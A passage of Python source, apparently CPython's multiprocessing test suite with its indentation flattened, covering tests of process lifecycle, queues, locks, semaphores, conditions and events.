def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
